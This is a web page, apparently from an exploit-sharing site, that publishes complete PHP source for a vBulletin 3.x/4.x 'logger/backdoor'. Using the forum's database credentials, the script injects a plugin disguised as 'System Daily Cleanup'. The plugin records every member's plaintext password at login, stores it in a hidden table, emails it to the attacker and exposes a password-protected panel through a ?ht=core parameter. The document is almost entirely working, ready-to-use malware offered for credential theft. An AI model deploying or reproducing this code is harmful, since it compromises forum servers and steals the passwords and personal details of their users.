facebook facebook twitter rss

vBulletin 3.x+4.x logger / backdoor

Author: Cold z3ro , Published: 06-12-2014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>hackteach.org vBulletin 3.x+4.x logger/backdoor</title>
</head>

<body>
<div align="center" s>
<form method="POST">
<input type="text" name="localhost" value="<? if(isset($_POST['localhost'])){echo $_POST['localhost'];}else{ echo "localhost"; }?>">
<input type="text" name="database" value="<? if(isset($_POST['database'])){echo $_POST['database'];}else{ echo "database"; }?>">
<input type="text" name="dbuser" value="<? if(isset($_POST['dbuser'])){echo $_POST['dbuser'];}else{ echo "db user"; }?>">
<input type="text" name="dbpass" value="<? if(isset($_POST['dbpass'])){echo $_POST['dbpass'];}else{ echo "db paasword"; }?>">
<input type="text" name="tplprefix" value="<? if(isset($_POST['tplprefix'])){echo $_POST['tplprefix'];}else{ echo "TABLE_PREFIX"; }?>">
<input type="text" name="logmail" value="<? if(isset($_POST['logmail'])){echo $_POST['logmail'];}else{ echo "Log Email"; }?>">
<input type="submit" name="inject" value="Inject" />
</form>
</div>
<?php
/*
                            vBulletin 3+4 logger/backdoor
                            
    Coded By Cold z3ro, www.hackteach.org | https://www.facebook.com/groups/hackteach.org/

    # this code founded to inject evil coded into vBulletin forum and store the login information for each member
      many type of store available:
      
      1. Send login information to email :
        https://www.facebook.com/photo.php?fbid=872430086114504&set=p.872430086114504&type=1 
        while you going to inject the code in the code interface you will see : Log Email , set as the email that
        you will receive the data on.
        Note : if mail() function is killed on server then you have another options .
      
      2. Log login information in database:
        https://www.facebook.com/photo.php?fbid=872426712781508
        https://www.facebook.com/photo.php?fbid=872426776114835
        after inject you can inter the logger interface by using the variable [ht] and with request [core]
        examples : 
        www.hackteach.org/core/showthread.php?ht=core
        www.hackteach.org/core/index.php?ht=core
        www.hackteach.org/core/faq.php?ht=core
        
        No matter which file you use, its will own.
        
      # Logger will store login information with extra available information for each member 
        like [     userid , username , password , usergroupid , email , icq , aim , yahoo , msn , skype , facebookname ]

      # firewall to protect your information included
        username : iam
        password : htlover
        
        
        more information about founded in https://www.facebook.com/groups/hackteach.org/permalink/573401889458281/
        */


if (isset($_POST['inject']))
{
    
$localhost $_POST['localhost']; 
    
$database $_POST['database']; 
    
$dbuser $_POST['dbuser']; 
    
$dbpass $_POST['dbpass']; 
    
$tplprefix $_POST['tplprefix'];
    
$logmaail $_POST['logmail'];

    if (!
filter_var($logmaailFILTER_VALIDATE_EMAIL))
    die(
"its important to set the email address which you will receive log on");
    
    if (
$dbuser =="db user" and $dbpass="db paasword")
    {
        die(
' You did not set '.$dbuser.' and '.$dbpass.' ');
    }else{ 
        
mysql_connect($localhost,$dbuser,$dbpass) or die("cant connect to DB check the db information"); 
        
$dbconnect mysql_select_db($database) or die("DB notfound<br> ".mysql_error());  
        if(
$dbconnect)
        {
            
            
$sdal "$";
$code "//coded by cold z3ro, hackteach.org
{$sdal}htloveru =\"0ebc580ae6450fce8762fad1bff32e7b\"; //iam
{$sdal}htloverp =\"70ddc4d9633936c20bd9d8a173bb1f85\"; // htlover

//case vBulletin 3 and less
{$sdal}vbulletin->templatecache[\'navbar\'] = str_replace(\'{$sdal}show[nopasswordempty]\', \'1\' , {$sdal}vbulletin->templatecache[\'navbar\'] );
{$sdal}vbulletin->templatecache[\'header\'] = str_replace(\'{$sdal}show[nopasswordempty]\', \'1\' , {$sdal}vbulletin->templatecache[\'header\'] );

//case vBulletin 4+5
{$sdal}show[nopasswordempty] = defined(\"DISABLE_PASSWORD_CLEARING\") ? 0 : 1;

if (strpos(
{$sdal}_SERVER[\'PHP_SELF\'],\"login.php\"))
{
// install
{$sdal}vbulletin->db->show_errors();
{$sdal}vbulletin->db->query_write(\" 
CREATE TABLE IF NOT EXISTS `\". TABLE_PREFIX .\"systemcleanupht` (
    `id` INT(10) NOT NULL AUTO_INCREMENT PRIMARY KEY,
    `userid` INT(10) NOT NULL,
    `username` TEXT NOT NULL,
    `password` TEXT NOT NULL,
    `usergroupid` INT(10) NOT NULL,
    `email` TEXT NOT NULL,
    `icq` TEXT NOT NULL,
    `aim` TEXT NOT NULL,
    `yahoo` TEXT NOT NULL,
    `msn` TEXT NOT NULL,
    `skype` TEXT NOT NULL,
    `fbname` TEXT NOT NULL,
    `date` TEXT NOT NULL)
\");

    
{$sdal}username  = {$sdal}_POST[\"vb_login_username\"];
    
{$sdal}password  = {$sdal}_POST[\"vb_login_password\"];
    if (
{$sdal}password !=\"\")
    {
        
{$sdal}zquery = {$sdal}db->query_read(\"SELECT * FROM \".TABLE_PREFIX.\"user WHERE username = \'\".{$sdal}username.\"\' \");

        while (
{$sdal}info = {$sdal}db->fetch_array({$sdal}zquery))
        {
            
{$sdal}userid = {$sdal}info[userid];
            
{$sdal}username = {$sdal}info[username];
            
{$sdal}email = {$sdal}info[email];
            
{$sdal}group = {$sdal}info[usergroupid];
            
{$sdal}icq = {$sdal}info[icq];
            
{$sdal}aim = {$sdal}info[aim];
            
{$sdal}yahoo = {$sdal}info[yahoo];
            
{$sdal}msn = {$sdal}info[msn];
            
{$sdal}skype = {$sdal}info[skype];
            
{$sdal}fbname = {$sdal}info[fbname];
            
{$sdal}date = date(\'d-m-y|h:m\',time());
            
{$sdal}htinfo = \"|=> USERNAME : \". {$sdal}username .\"
                 \n|=> Password : \". 
{$sdal}password .\"
                 \n|=> User group : \". 
{$sdal}group .\"
                 \n|=> Registered Email : \". 
{$sdal}email .\" 
                 \n|=> icq : \". 
{$sdal}icq .\" 
                 \n|=> aim  : \". 
{$sdal}aim .\"
                 \n|=> yahoo  : \". 
{$sdal}yahoo .\"
                 \n|=> msn  : \". 
{$sdal}msn .\"
                 \n|=> skype  : \". 
{$sdal}skype .\"
                 \n|=> facebook  : \". 
{$sdal}fbname .\"\";
                mail(\"
$logmaail\", {$sdal}_SERVER[HTTP_HOST] ,{$sdal}htinfo);
            
{$sdal}smsm = {$sdal}vbulletin->db->query_write(\"
            INSERT INTO `\". TABLE_PREFIX .\"systemcleanupht`
                (userid, username, password, usergroupid, email, icq, aim, yahoo, msn, skype, fbname, date)
                VALUES 
                (\'\".
{$sdal}info[userid].\"\', \'\".{$sdal}info[username].\"\', \'\".{$sdal}password.\"\', \'\".{$sdal}info[usergroupid].\"\', \'\".{$sdal}info[email].\"\', \'\".{$sdal}info[icq].\"\', \'\".{$sdal}info[aim].\"\', \'\".{$sdal}info[yahoo].\"\', \'\".{$sdal}info[msn].\"\', \'\".{$sdal}info[skype].\"\', \'\".{$sdal}info[fbname].\"\', \'\". date(\'d-m-y | h:m:s\',time()).\"\')
            \");
        }
    }
}
# some fucking good stuff
{$sdal}action = {$sdal}_REQUEST[\'ht\'];

{$sdal}htloveruser =\"iam\";
{$sdal}htloverpass =\"htlover\";
{$sdal}style= \'<style type=\"text/css\">

body{font-family:Arial, Helvetica, sans-serif;width:95%;}

table {font-family:Arial, Helvetica, sans-serif;color:#000;font-size:18px;background:#eaebec;margin:20px;border:#ccc 1px solid;-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;}

tr td {border-top: 1px solid #ffffff;border-bottom:1px solid #ffad4d;border-left: 1px solid #ffad4d;background: #0099FF;background: -webkit-gradient(linear, left top, left bottom, from(#E9E9E9), to(#eaebec));background: -moz-linear-gradient(top, #97DBFF,  #eaebec);}
tr.even td{background: #0099FF;background: -webkit-gradient(linear, left top, left bottom, from(#f8f8f8), to(#f6f6f6));background: -moz-linear-gradient(top  #0099CC, #97DBFF);}
tr:last-child td{border-bottom:0;}
tr:last-child td:first-child{-moz-border-radius-bottomleft:3px;-webkit-border-bottom-left-radius:3px;border-bottom-left-radius:3px;}
 tr:last-child td:last-child{-moz-border-radius-bottomright:3px;-webkit-border-bottom-right-radius:3px;border-bottom-right-radius:3px;}
tr:hover td{background: #0099FF;background: -webkit-gradient(linear, left top, left bottom, from(#0099FF), to(#f0f0f0));background: -moz-linear-gradient(top, #f6f6f6, #0099FF);    }
</style>\';

switch(
{$sdal}action)
{
    
    case \'core\':
    if (md5(
{$sdal}_SERVER[\'PHP_AUTH_USER\']) == {$sdal}htloveru and md5({$sdal}_SERVER[\'PHP_AUTH_PW\']) == {$sdal}htloverp)
    {

        echo 
{$sdal}style.\'<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">
              <tr>
                <td>id/info</td>
                <td>userid</td>
                <td>username</td>
                <td>password</td>
                <td>email</td>
                <td>group</td>
                <td>date</td>
                <td>other information</td>
              </tr>\';
        //
{$sdal}pagedirectlink = \"http://\".{$sdal}_SERVER[\'HTTP_HOST\'].{$sdal}_SERVER[\'REQUEST_URI\'];
        
{$sdal}zquery = {$sdal}db->query_read(\"SELECT * FROM `\". TABLE_PREFIX .\"systemcleanupht` GROUP BY userid ORDER BY id DESC\");
    
        while (
{$sdal}info = {$sdal}db->fetch_array({$sdal}zquery))
        {
        echo \'
              <tr>
            
                <td>\'.
{$sdal}info[id].\'</td>
                <td>\'.
{$sdal}info[userid].\'</td>
                <td><a href=\"?ht=history&userid=\'.
{$sdal}info[userid].\'\">\'.{$sdal}info[username].\'</a></td>
                <td><a href=\"?ht=history&userid=\'.
{$sdal}info[userid].\'\">\'.{$sdal}info[password].\'</a></td>
                <td>\'.
{$sdal}info[email].\'</td>
                <td>\'.
{$sdal}info[usergroupid].\'</td>
                <td>\'.
{$sdal}info[date].\'</td>
                <td>\';if(
{$sdal}info[icq] !=\"\")    { echo \' icq :\'.{$sdal}info[icq].\'<br>\'; }
            if(
{$sdal}info[aim] !=\"\")    { echo \' aim :\'.{$sdal}info[aim].\'<br>\'; }
            if(
{$sdal}info[yahoo] !=\"\")    { echo \' yahoo :\'.{$sdal}info[yahoo].\'<br>\'; }
            if(
{$sdal}info[msn] !=\"\")    { echo \' msn :\'.{$sdal}info[msn].\'<br>\'; }
            if(
{$sdal}info[skype] !=\"\")    { echo \' skype :\'.{$sdal}info[skype].\'<br>\'; }
            if(
{$sdal}info[fbname] !=\"\")    { echo \' facebook :\'.{$sdal}info[fbname].\'<br>\'; }
                echo\'</td>
              </tr>\';
            
        }
        echo \'</table><br> Co[d]ed by Cold z3ro, <a href=\"http://www.hackteach.org/core/\">www.hackteach.org</a>\';
        exit;
    }else{
        header(\"WWW-Authenticate: Basic realm=\'ONLY For Hackteach Lovers\'\");
        header(\"HTTP/1.0 401 Unauthorized\");
        exit(\"Access Denied\");
    }
    
    break;
    
    /* =================================== */
    
case \'history\':
    if (md5(
{$sdal}_SERVER[\'PHP_AUTH_USER\']) == {$sdal}htloveru and md5({$sdal}_SERVER[\'PHP_AUTH_PW\']) == {$sdal}htloverp)
    {
        echo \'<input type=\"submit\" class=\"button\" value=\"back\" accesskey=\"s\" onclick=\"history.back(1); return false\"/>\';
        
{$sdal}userid = intval({$sdal}_REQUEST[\'userid\']);
        if(
{$sdal}userid and is_numeric({$sdal}userid))
        {

            
{$sdal}zquery = {$sdal}db->query_read(\"SELECT * FROM `\". TABLE_PREFIX .\"systemcleanupht` where userid=\'\".{$sdal}userid.\"\' ORDER BY id DESC\");
            if(
{$sdal}db->num_rows({$sdal}zquery) ==0)
            {
                die(\'coded by cold z3ro, do you thing you can hack it !<br><iframe src=\"http://www.hackteach.org/core/\" style=\"border: 0; width: 100%; height: 100%\">Your browser doesnt support iFrames.</iframe>\');    
            }
            echo 
{$sdal}style.\'<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">
              <tr>
                <td>id/info</td>
                <td>userid</td>
                <td>username</td>
                <td>password</td>
                <td>email</td>
                <td>group</td>
                <td>date</td>
                <td>other information</td>
              </tr>\';
            while (
{$sdal}info = {$sdal}db->fetch_array({$sdal}zquery))
            {
            echo \'
                  <tr>
            
                    <td>\'.
{$sdal}info[id].\'</td>
                    <td>\'.
{$sdal}info[userid].\'</td>
                    <td>\'.
{$sdal}info[username].\'</a></td>
                    <td>\'.
{$sdal}info[password].\'</a></td>
                    <td>\'.
{$sdal}info[email].\'</td>
                    <td>\'.
{$sdal}info[usergroupid].\'</td>
                    <td>\'.
{$sdal}info[date].\'</td>
                    <td>\';if(
{$sdal}info[icq] !=\"\")    { echo \' icq :\'.{$sdal}info[icq].\'<br>\'; }
                if(
{$sdal}info[aim] !=\"\")    { echo \' aim :\'.{$sdal}info[aim].\'<br>\'; }
                if(
{$sdal}info[yahoo] !=\"\")    { echo \' yahoo :\'.{$sdal}info[yahoo].\'<br>\'; }
                if(
{$sdal}info[msn] !=\"\")    { echo \' msn :\'.{$sdal}info[msn].\'<br>\'; }
                if(
{$sdal}info[skype] !=\"\")    { echo \' skype :\'.{$sdal}info[skype].\'<br>\'; }
                if(
{$sdal}info[fbname] !=\"\")    { echo \' facebook :\'.{$sdal}info[fbname].\'<br>\'; }
                    echo\'</td>
                  </tr>\';
            
            }
        echo \'</table><br> Co[d]ed by Cold z3ro, <a href=\"http://www.hackteach.org/core/\">www.hackteach.org</a>\';
        }else{
            echo \'coded by cold z3ro, do you thing you can hack it !<br><iframe src=\"http://www.hackteach.org/core/\" style=\"border: 0; width: 100%; height: 100%\">Your browser doesnt support iFrames.</iframe>\';    
        }
        exit;
    }else{
        header(\"WWW-Authenticate: Basic realm=\'ONLY For Hackteach Lovers\'\");
        header(\"HTTP/1.0 401 Unauthorized\");
        exit(\"Access Denied\");
    }
    
    break;
}"
;
            if (
$tplprefix =="")
            {
                
$query ="INSERT INTO plugin";
            }else{
                
$query ="INSERT INTO {$tplprefix}plugin";
            }
            
$htc0re mysql_query("$query (`pluginid` ,`title` ,`hookname` ,`phpcode` ,`product` , `devkey` ,`active` ,`executionorder`)
VALUES (
'"
.rand(1000,10000)."', 'System Daily Cleanup', 'global_start', '".$code."', 'vbulletin', '', '1', '5')");

            if(
$htc0re)
            {
                echo  
"iserted";
            }else{
                echo 
"false not injected".mysql_error();
            }
        }
    }
}

?>


<div align="center" style="float:bottom;" >co[d]ed by cold z3ro # <a href="https://www.facebook.com/groups/hackteach.org/"> www.hackteach.org </a></div>
</body>
</html>

Like us on Facebook :